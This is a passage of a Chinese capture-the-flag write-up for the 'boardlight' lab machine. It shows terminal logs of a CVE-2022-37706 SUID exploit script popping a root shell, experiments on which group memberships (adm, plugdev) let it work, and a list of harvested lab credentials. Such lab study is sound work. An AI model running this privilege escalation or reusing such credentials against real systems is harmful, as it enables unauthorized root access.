因为 www-data用户不在特定的组里面(如 adm plugdev 等),无法使用 /bin/mount
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
这里我创建了一个新用户 c1trus
他的id信息为 uid=1005(c1trus) gid=1005(c1trus) groups=1005(c1trus)
c1trus@boardlight:/tmp$ id
uid=1005(c1trus) gid=1005(c1trus) groups=1005(c1trus)
c1trus@boardlight:/tmp$ bash 1.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
>>>> ERROR: ACTION NOT ALLOWED: /bin/mount
然后我将其加入 adm 或者 plugdev 组,
root@boardlight:/tmp# usermod -aG plugdev c1trus
root@boardlight:/tmp# su c1trus
c1trus@boardlight:/tmp$ id
uid=1005(c1trus) gid=1005(c1trus) groups=1005(c1trus),46(plugdev)
c1trus@boardlight:/tmp$ bash 1.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# exit
root@boardlight:/tmp# usermod -aG adm c1trus
root@boardlight:/tmp# su c1trus
c1trus@boardlight:/tmp$ id
uid=1005(c1trus) gid=1005(c1trus) groups=1005(c1trus),4(adm)
c1trus@boardlight:/tmp$ bash 1.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1005(c1trus)
如果我把 larissa 用户移除 adm 组,那么此用户也不能执行 /bin/mount
root@boardlight:/tmp# gpasswd -d larissa adm
Removing user larissa from group adm
root@boardlight:/tmp# su larissa
larissa@boardlight:/tmp$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa)
larissa@boardlight:/tmp$ bash 1.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
1.sh: line 20: /tmp/exploit: Permission denied
chmod: changing permissions of '/tmp/exploit': Operation not permitted
[+] Enjoy the root shell :)
ERROR: ACTION NOT ALLOWED: /bin/mount
4.2. 凭证
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
crm.board.htb后台: admin admin
User: larissa serverfun2$2023!!